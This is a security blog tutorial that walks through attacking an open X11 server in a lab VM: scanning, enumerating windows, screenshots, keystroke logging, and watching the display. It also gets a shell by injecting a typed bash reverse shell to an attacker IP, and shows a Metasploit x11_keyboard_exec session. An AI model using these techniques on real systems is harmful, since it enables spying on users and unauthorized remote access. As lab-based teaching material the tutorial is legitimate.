Zach Grace

Musing on security, mostly offensive.

13 May 2016

X11 Hacking

Setup

This tutorial is based on the X11 server in the PWN Lab project. To install the VM, follow the instructions in the pwn_lab README, then execute the commands below. This VM will take a while to finish installing and configuring as it needs to download and install the ubuntu-desktop packages.

git clone https://github.com/ztgrace/pwn_lab.git
cd pwn_lab/x11
vagrant up

If all goes well, you should have a VM running that looks like this:

X11 VM

Attacker Setup

Install some required packages:

apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy

Installing xwatchwin

wget http://www.ibiblio.org/pub/X11/contrib/utilities/xwatchwin.tar.gz
tar zxvf xwatchwin.tar.gz
cd xwatchwin/
xmkmf && make && make install

Reconnaissance

X11 generally runs on ports 6000-60063, however it’s most typically found on ports 6000-6002. We can use Nmap to scan for and identify X11.

root@pwnlab-kali-mini:~# nmap -sV -n -v -p 6000-6002 172.16.31.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-02 22:29 EST
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 22:29
Scanning 172.16.31.102 [1 port]
Completed ARP Ping Scan at 22:29, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:29
Scanning 172.16.31.102 [3 ports]
Discovered open port 6000/tcp on 172.16.31.102
Completed SYN Stealth Scan at 22:29, 0.00s elapsed (3 total ports)
Initiating Service scan at 22:29
Scanning 1 service on 172.16.31.102
Completed Service scan at 22:29, 6.01s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.31.102.
Nmap scan report for 172.16.31.102
Host is up (0.00044s latency).
PORT     STATE  SERVICE VERSION
6000/tcp open   X11     X.Org (open)
6001/tcp closed X11:1
6002/tcp closed X11:2
MAC Address: 08:00:27:1A:F3:00 (Cadmus Computer Systems)
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.21 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (152B)

Gathering Window Info

Before we start exploiting the system, it’s useful to gather some information about the windows. The xwininfo command

root@pwnlab-kali-mini:~# xwininfo -root -tree -display 172.16.31.102:0

xwininfo: Window id: 0x101 (the root window) (has no name)

  Root window id: 0x101 (the root window) (has no name)
  Parent window id: 0x0 (none)
     40 children:
     0x30002a7 "update-manager": ()  10x10+-100+-100  +-100+-100
     0x3000003 (has no name): ("update-manager" "Update-manager")  254x98+0+0  +0+0
        1 child:
        0x3000004 (has no name): ()  1x1+-1+-1  +-1+-1
     0x3000001 "update-manager": ("update-manager" "Update-manager")  10x10+10+10  +10+10
        1 child:
        0x3000002 (has no name): ()  1x1+-1+-1  +9+9
     0x2e00003 "update-notifier": ()  10x10+-100+-100  +-100+-100
     0x2e00001 "update-notifier": ("update-notifier" "Update-notifier")  10x10+10+10  +10+10
        1 child:
        0x2e00002 (has no name): ()  1x1+-1+-1  +9+9
     0x2c00001 "applet.py": ("applet.py" "Applet.py")  10x10+10+10  +10+10
        1 child:
        0x2c00002 (has no name): ()  1x1+-1+-1  +9+9
     0x1c00001 (has no name): ()  10x10+-20+-20  +-20+-20
     0xe00001 "Terminal": ("gnome-terminal" "Gnome-terminal")  10x10+10+10  +10+10
        1 child:
        0xe00002 (has no name): ()  1x1+-1+-1  +9+9
     0x1200068 (has no name): ()  10x10+0+0  +0+0

Screenshot The Display

The xwd tool can be used to create a screenshot of the remote desktop.

xwd -root -screen -silent -display 10.10.10.10:0 > screenshot.xwd
convert screenshot.xwd screenshot.png

Exploitation

Keystroke logging

Keystroke logging can be accomplished using the xspy tool.

root@pwnlab-kali-mini:~# xspy
opened 172.16.31.102:0 for snoopng
test

X11 VM

Watching The Display

To watch the display, you can use xwatchwin to watch a specific window or the entire desktop using the root window identifier.

./xwatchwin -u 0.5 172.16.31.102:0 root

Getting Shell

Method 1: xdotool

xdotool key alt+F2
xdotool type 'xterm'
xdotool key KP_Enter
xdotool type --delay 50 'bash -i >& /dev/tcp/192.168.59.10/4444 0>&1'
xdotool key KP_Enter

On the attacker machine, catch the reverse shell:

# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.59.10] from (UNKNOWN) [192.168.59.3] 52876
vagrant@pwnlab-x11:~$

Method 2: Metasploit

A recent Metasploit module was released and has simplified this attack by registering a virtual keyboard, then typing in the specified payload.

016-02-03 07:07:30 - S:0 J:0  > use exploit/unix/x11/x11_keyboard_exec
2016-02-03 07:07:32 - S:0 J:0  exploit(x11_keyboard_exec) > show options

Module options (exploit/unix/x11/x11_keyboard_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      172.16.31.102    yes       The target address
   RPORT      6000             yes       The target port
   TIME_WAIT  5                yes       Time to wait for opening GUI windows in seconds


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.59.10    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   xterm (Generic)


2016-02-03 07:07:36 - S:0 J:0  exploit(x11_keyboard_exec) > set LHoST 192.168.59.10
LHoST => 192.168.59.10
2016-02-03 07:07:52 - S:0 J:0  exploit(x11_keyboard_exec) > exploit

[*] Started reverse TCP handler on 192.168.59.10:4444
[*] 172.16.31.102:6000 - Register keyboard
[*] 172.16.31.102:6000 - Opening "Run Application"
[*] 172.16.31.102:6000 - Waiting 5 seconds...
[*] 172.16.31.102:6000 - Opening xterm
[*] 172.16.31.102:6000 - Waiting 5 seconds...
[*] 172.16.31.102:6000 - Typing and executing payload
[*] Command shell session 1 opened (192.168.59.10:4444 -> 192.168.59.3:61742) at 2016-02-03 07:09:20 -0600

id
uid=1000(vagrant) gid=1000(vagrant) groups=4(adm),20(dialout),24(cdrom),46(plugdev),108(lpadmin),109(sambashare),110(admin),1000(vagrant)

Don’t Forget About Desktops!

Most Linux window managers have multiple desktops. I’ve come across an open X11 server on an engagement with nothing on the first desktop, but a root shell on a different one. Using the xdotool, you can change which desktop you’re viewing and manipulating. Be warned, This desktop switch would be visible to anyone else viewing the desktop.

export DISPLAY=172.16.31.102:0
xdotool get_desktop
0
xdotool set_desktop 1

A stealither way of exploiting this root shell would be to comb through the xwininfo output, and using the window option of xdotool to send commands directly to the window.

References